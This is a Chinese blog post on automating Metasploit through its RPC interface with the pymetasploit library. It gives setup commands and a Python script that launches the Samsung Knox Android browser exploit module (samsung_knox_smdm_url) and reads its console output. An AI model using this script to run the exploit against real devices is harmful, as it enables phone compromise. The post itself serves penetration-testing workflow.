分享一个metasploit快速测试脚本的TIPS,metasploittips,相信用过metasplo
分享一个metasploit快速测试脚本的TIPS,metasploittips,相信用过metasplo
相信用过metasploit的同学都很苦逼,msfconsole漫长的启动时间,如果测试中敲错命令,或不小心退出后又重启任务,会让你直接抓狂。之前不想重复敲命令,看了下metasploit的开发文档,发现要自动化有各种方案,个人感觉最方便的是调用RPC接口,GITHUB上搜了把,发现有大拿封装好了模块,直接调用即可:1.安装pymetasploit模块gitclone https://github.com/allfro/pymetasploit切到目录sudopythonsetup.pyinstall2.启动metasploit的RPC服务msfrpcd-Ptest-n-f-a127.0.0.1这个test是rpc服务的密码,用户名默认是msf3.定制自己的测试脚本我这里定制的是测试三星knox漏洞的脚本,思路是每次启动先把之前运行的job和console停掉,然后自动创建一个console自动敲入命令进行新的漏洞测试,直接crtl-c结束脚本再重新测试都是一个新的job,而且每次测试都是秒开,不用再重启msfconsole了。中间各种接口怎么用,推荐大家再翻下官方的文档。
from metasploit.msfrpc import MsfRpcClientimport timeclient = MsfRpcClient('test')jobs = client.call('job.list')for num in jobs.keys(): if jobs[num].find('samsung_knox_smdm_url')>0: client.call('job.stop',num)console = client.call('console.list')for _console in console['consoles']: if _console.has_key('prompt'): if _console['prompt'].find('samsung_knox_smdm_url')>0: client.call('console.destroy', _console['id'])cmd='''use exploit/android/browser/samsung_knox_smdm_urlset LHOST 127.0.0.1exploit'''res = client.call('console.create')console_id = res['id']client.call('console.write', console_id, cmd) try: while True: res = client.call('console.read',console_id) if len(res['data']) > 1: print res['data'], if res['busy'] == True: time.sleep(1) continueexcept: pass
来自:http://weibo.com/p/1001603795720149837992
相关内容
- 用Python杀掉windows平台下的进程,pythonwindows,# "这段代
- Python 生成随机密码,python生成,import strin
- Python将阿拉伯数字转化为中文大写,python阿拉伯,利用
- 用 python 实现各种排序算法,python算法,总结了一下常见
- python生成图片,,import cv2.c
- Python实现登录人人网并抓取新鲜事的方法,python新鲜事
- 求a到b之间所有质数,求a质数,def Prime(b)
- Python汉字转拼音,python汉字拼音,使用字典和转换程序
- pygame tetromino 俄罗斯方块,pygametetromino,import pygam
- pil 放缩图像功能,pil缩图像功能,import Image
评论关闭